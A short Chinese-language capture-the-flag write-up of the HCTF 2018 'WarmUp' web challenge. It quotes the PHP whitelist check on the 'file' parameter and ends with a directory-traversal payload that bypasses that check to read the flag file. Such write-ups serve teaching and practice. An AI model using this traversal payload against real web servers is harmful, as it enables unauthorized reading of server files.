[HCTF 2018]WarmUp

发布时间 2023-09-16 17:10:19作者: 回忆的金鱼

[HCTF 2018]WarmUp

打开看到什么也没有提示,f12查看网页源代码

image20230916095441004

看到到了source.php,进行访问

image20230916095604364

看到了一大串的php代码,尝试进行解读

image20230916095657689

大致意思是满足三个条件会看到REQUEST['file']

if ( !empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'] )

source.php?file=source.php?/../../../../ffffllllaaaagggg